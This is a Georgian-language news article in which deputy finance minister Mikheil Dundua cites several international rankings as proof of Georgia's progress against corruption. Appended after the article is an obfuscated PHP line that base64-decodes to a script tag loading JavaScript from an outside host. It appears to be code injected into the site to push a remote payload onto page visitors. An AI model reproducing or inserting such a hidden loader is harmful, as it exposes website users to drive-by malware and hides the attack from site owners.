celsiusi
ავერსი საქკაბელი

ფინანსთა მინისტრის მოადგილე მიხეილ დუნდუა კორუფციის წინააღმდეგ ბრძოლის მიმართულებით ბოლო წლებში საქართველოს მიერ მიღწეულ პროგრესზე საუბრობს. მისი თქმით, ეს დასტურდება არაერთი საერთაშორისო კვლევის მიხედვით.

როგორც მან აღნიშნა, გასულ წელს კორუფციის აღქმის ინდექსით საქართველო  აღმოსავლეთ ევროპის და ცენტრალურ აზიის რეგიონში ლიდერობს და პირველად ინდექსის ისტორიაში - ევროპის საუკეთესო ოცეულშია.

„საქართველო 180 ქვეყანას შორის 4 ადგილით დაწინაურდა, შეფასების ქულა გაიუმჯობესა, 41-ე ადგილს იკავებს და ბოლო 7 წელია, ინარჩუნებს პოზიციას საუკეთესო ქვეყნების 25 პროცენტში. ჩვენი ქვეყანა ევროპის საუკეთესო ოცეულში 20-ე ადგილზეა იტალიასთან, სლოვენიასა და ჩეხეთთან ერთად თანაბარი 56 ქულით. საქართველო პირველ ადგილზეა  შავიზღვისპირეთში, კავკასიასა და ცენტრალურ აზიაშიც“, - აცხადებს ფინანსთა მინისტრის მოადგილე მიხეილ დუნდუა.

მისი თქმით, „მექრთამეობის რისკის მატრიცის“ მიხედვით, ანუ მექრთამეობის რისკის სიმცირით,  2022 წლის ნოემბერში გამოქვეყნებული კვლევით, საქართველო მსოფლიოს 197 ქვეყანას შორის 33-ე ადგილზეა.  

„საქართველო რეიტინგში უთანაბრდება ჩეხეთს და უსწრებს ევროკავშირის და ნატოს წევრ 14 სახელმწიფოს.  საქართველო პირველ ადგილზეა კავკასიასა და შავიზღვისპირეთში, პოსტსაბჭოთა ქვეყნებიდან ჩამორჩება მხოლოდ ბალტიისპირეთის ქვეყნებს. საქართველოს რეიტინგში მკვეთრად ჩამორჩება ევროკავშირის წევრობის კანდიდატი ყველა ქვეყანა,“ - აცხადებს მიხეილ დუნდუა.

როგორც იგი აღნიშნავს, ინდექსი 2014 წლიდან იწარმოება. მისი მეთოდოლოგია  გაუმჯობესებას განიცდის წლიდან წლამდე და ქვეყნებს უფრო და უფრო მკაცრი კრიტერიუმების დაკმაყოფილება უწევთ რეიტინგში კარგი პოზიციის დასაკავებლად. რეიტინგში საქართველოს მუდმივად მსოფლიოს მოწინავე და წარმატებულ ქვეყნებს შორის უკავია ადგილი.

„2014 წლამდე ეს ინდექსი არ იწარმოებოდა, თუმცა ქვეყანაში კორუფციის ფაქტების შესახებ და 2012 წლამდე არსებულ პერიოდზე, არსებობს  სხვა რესპექტაბელური ინდექსები. მაგალითად, ვაშინგტონის ნომერ პირველი ანალიტიკური ცენტრის, „ჰერითიჯ ფაუნდეიშენის მთავრობის კეთილსინდისიერების ინდექსის მიხედვით“ 2004-2012 წლებში, საქართვლოს ხელისუფლებას აქვს კორუმპირებული, არაკეთილსინდისიერი მმართველობის შეფასება, ოფიციალური სტატუსით „რეპრესიული“ . კონკრეტულად, 2012 წელს საქართველო რეიტინგში 69-ე ადგილზეა.  2023 წლის ინდექსის მიხედვით კი საქართველოს მთავრობა მსოფლიოს 40 საუკეთესო ქვეყნას შორის სახელდება, უსწრებს ევროკავშირის და ნატოს წევრ 15 სახელმწიფოს და აქვს კეთილსინდისიერების დამადასტურებელი ოფიციალური შეფასება, სტატუსით „ზომიერად თავისუფალი“, - აცხადებს მიხეილ დუნდუა.

მისი თქმით. მსოფლიოს მასშტაბით კორუფციის შემფასებელ ინდექსებს, კვლევებს, გამოკითხვებს და ექსპერტიზას ,ყოველწლიურად თავს უყრის და აჯამებს მსოფლიო ბანკი „გლობალური მმართველობის ინდიკატორების“ აგრეგატში სახელწოდებით: „კორუფციის კონტროლი“. 

“აღსანიშნავია, რომ 2013 წლამდე გამოქვეყნებულ ამ შემაჯამებელ რეიტინგში საქართველო, „კორუფციის კონტროლის“ მიხედვით, მსოფლიო ბანკის წევრ ქვეყნებს შორის 62-ე ადგილზე იყო. შედარებისთვის, 2022 წელს მსოფლიო ბანკის წევრ 189 ქვეყანას შორის საქართველო მე-40 ადგილზე გავიდა და საუკეთესო ქვეყნების 25%-ში მოხვდა“, – აცხადებს მიხეილ დუნდუა.

მისი თქმით, ეს კვლევები ადასტურებს, რომ ათი წლის განმავლობაში ქვეყანამ უდიდეს პროგრესს მიაღწია და საქართველო დასახელებულია საუკეთესო ქვეყნებს შორის რეგიონსა და მსოფლიოში კორუფციის წინააღმდეგ ბრძოლის მიმართულებით.

369
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");